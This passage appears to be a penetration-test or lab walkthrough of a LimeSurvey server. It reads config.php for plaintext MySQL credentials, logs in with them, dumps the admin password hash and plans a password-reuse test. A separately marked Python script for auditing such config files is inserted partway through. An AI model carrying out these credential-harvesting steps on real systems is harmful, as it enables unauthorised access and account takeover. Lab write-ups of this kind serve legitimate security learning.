MySQL


Checking the LimeSurvey configuration for DB credentials after manual system enumeration:

$ cat /var/www/LimeSurvey/application/config/config.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
|    'connectionString' Hostname, database, port and database type for 
|     the connection. Driver example: mysql. Currently supported:
|                 mysql, pgsql, mssql, sqlite, oci
|    'username' The username used to connect to the database
|    'password' The password used to connect to the database
|    'tablePrefix' You can add an optional prefix, which will be added
|                 to the table name when using the Active Record class
|
*/
return array(
	'components' => array(
		'db' => array(
			'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',
			'emulatePrepare' => true,
			'username' => 'limesurvey_user',
			'password' => 'EzPwz2022_dev1$$23!!',
			'charset' => 'utf8mb4',
			'tablePrefix' => 'lime_',
		),
		
		 'session' => array (
			'sessionName'=>'LS-EYFVWDSAKOIAECZM',
			// Uncomment the following lines if you need table-based sessions.
			// Note: Table-based sessions are currently not supported on MSSQL server.
			// 'class' => 'application.core.web.DbHttpSession',
			// 'connectionID' => 'db',
			// 'sessionTableName' => '{{sessions}}',
		 ),
		
		'urlManager' => array(
			'urlFormat' => 'path',
			'rules' => array(
				// You can add your own rules here
			),
			'showScriptName' => true,
		),
	
	),
	// For security issue : it's better to set runtimePath out of web access
	// Directory must be readable and writable by the webuser
	// 'runtimePath'=>'/var/limesurvey/runtime/'
	// Use the following config variable to set modified optional settings copied from config-defaults.php
	'config'=>array(
	// debug: Set this to 1 if you are looking for errors. If you still get no errors after enabling this
	// then please check your error-logs - either in your hosting provider admin panel or in some /logs directory
	// on your webspace.
	// LimeSurvey developers: Set this to 2 to additionally display STRICT PHP error messages and get full access to standard templates
		'debug'=>0,
		'debugsql'=>0, // Set this to 1 to enanble sql logging, only active when debug = 2
		// Mysql database engine (INNODB|MYISAM):
		 'mysqlEngine' => 'MYISAM'
 
,		// Update default LimeSurvey config here
	)
);
/* End of file config.php */
/* Location: ./application/config/config.php */

DB credential identified: limesurvey_user:EzPwz2022_dev1$$23!! (username:password). I will also test this password for reuse.
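A defender-side check for the exposure shown above, as an added example that is not part of the original notes: it audits a Yii-style config.php for loose file modes, a plaintext DB password and a non-zero debug value, without printing the secret. The names SAMPLE_CONFIG, PAIR, audit_config and demo are hypothetical, and the sample values are constructed placeholders.

```python
import pathlib
import re
import stat
import tempfile

# Constructed sample shaped like the config.php above; values are placeholders.
SAMPLE_CONFIG = """<?php
return array(
    'components' => array(
        'db' => array(
            'username' => 'example_user',
            'password' => 'PLACEHOLDER-not-a-real-secret',
            // 'password' => 'commented-out-entry',
        ),
    ),
    'config'=>array(
        'debug'=>2,
    )
);
"""

# 'key' => 'str' or 'key' => 123 at line start; //-commented entries are skipped.
PAIR = re.compile(r"^[ \t]*'(\w+)'\s*=>\s*(?:'((?:[^'\\]|\\.)*)'|(\d+))", re.M)


def audit_config(path):
    """Return hardening findings for one config file without echoing the secret."""
    findings = []
    mode = stat.S_IMODE(pathlib.Path(path).stat().st_mode)
    if mode & stat.S_IROTH:
        findings.append("world-readable (mode %03o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group/other (mode %03o)" % mode)
    text = pathlib.Path(path).read_text(encoding="utf-8", errors="replace")
    settings = {key: s or n for key, s, n in PAIR.findall(text)}
    if settings.get("password"):
        findings.append("plaintext DB password for user '%s'" % settings.get("username", "?"))
    if settings.get("debug", "0") != "0":
        findings.append("debug enabled (debug=%s)" % settings["debug"])
    return findings


def demo(mode=0o644):
    """Write the constructed sample with the given mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = pathlib.Path(tmp, "config.php")
        path.write_text(SAMPLE_CONFIG, encoding="utf-8")
        path.chmod(mode)
        return audit_config(path)
```

The web user has to read this file either way, so the plaintext finding is a prompt to give the DB account a unique password and minimal grants rather than something file modes alone can fix.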

Session


www-data@marketing:/var/www/LimeSurvey/application/config$ mysql -ulimesurvey_user -p
Enter password: EzPwz2022_dev1$$23!!
 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 81
Server version: 8.0.29-0ubuntu0.20.04.3 (Ubuntu)
 
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> 
mysql> use limesurvey
use limesurvey
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

Session established

mysql> select users_name,password from lime_users;
select users_name,password from lime_users;
+------------+--------------------------------------------------------------+
| users_name | password                                                     |
+------------+--------------------------------------------------------------+
| admin      | $2y$10$QxdVgZGY9odLkWsUYF7dNOkI.STdeEWnUiUse/9rkI.lg7T3QI5UG |
+------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

This is the admin user’s credential hash, but it’s already known; password N/A